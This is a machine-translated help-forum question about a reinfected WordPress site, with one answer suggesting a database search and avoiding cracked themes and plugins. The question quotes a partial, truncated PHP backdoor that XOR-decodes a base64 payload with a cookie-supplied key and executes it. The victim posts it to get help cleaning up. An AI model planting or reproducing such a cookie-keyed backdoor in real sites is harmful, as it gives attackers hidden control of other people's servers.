我在wordpress中的博客感染了病毒,它创建了.php文件,我已经搜索并执行了几项操作而没有取得好成绩。我曾经通过链接到不同文件夹中的.ico文件将其插入wp-config.php来创建代码。
现在我已经更改了托管,从头开始在wordpress中安装了所有内容,加载了主题,导入了数据库,并上传了uploads文件夹。
一切都很好,两天前,直到今天,我在fapwmudc.php_malicious_base64code_createfunction_infected.php中创建了文件wp-includes/,在插件和主题中创建了另外两个文件,我已经删除了它们。
.php代码是这样的:
<? php
$ zpmez =
'bGUpJGZpJztwJHRlaGFuX0xPc1snaGlzc3ViLT5zTWFpb2F1JykpPChofX0kYWRlZGl'.
'uIiwkaW9uIFhvZWFkSGVhcy0 + R0lOZGViaWMgXXszPiR0MDt0eHQsdGhpdGVtY2lwdG'.
//Many more lines ... and closes
'KSg =='
), $ _COOKIE [str_replace ('.', '_', $ _SERVER ['HTTP_HOST'])]). ';'); $ _bnvhbl ($ zpmez);
function bnvhbl ($ cdltur, $ eouvqa) {return $ cdltur ^ str_repeat ($ eouvqa, ceil (strlen ($ cdltur) / strlen ($ eouvqa))); }
?>
病毒必须在主题或数据库中,我该如何找到它? 我已经使用了所有的插件来使用,sucuri,wordfence(它是我找到文件最容易的东西),字符串定位器,来搜索代码字符串。和许多其他人。
答案 0 :(得分:0)
通过它的声音,'病毒'本身可能绑定到实际的数据库。您可以对数据库中的一些相关关键字进行一些全局搜索(例如,我会搜索'zpmez'),以查看是否有任何问题。
如果它是实际导致'病毒'的主题或插件,我建议仅使用常用的高级主题和插件,并且有数千次下载,并且最近更新。一般来说,de-bunked或破解的主题和插件都是这样做的,并且有自己隐藏的cron作业,这些作业在安装后几天运行,让你在安装时认为一切正常,让病毒有时间感染你的表
我希望你的网站上没有大量的内容,因为在一天结束时你可能需要从一个全新的安装开始,使用不同的主题/插件集......祝你好运。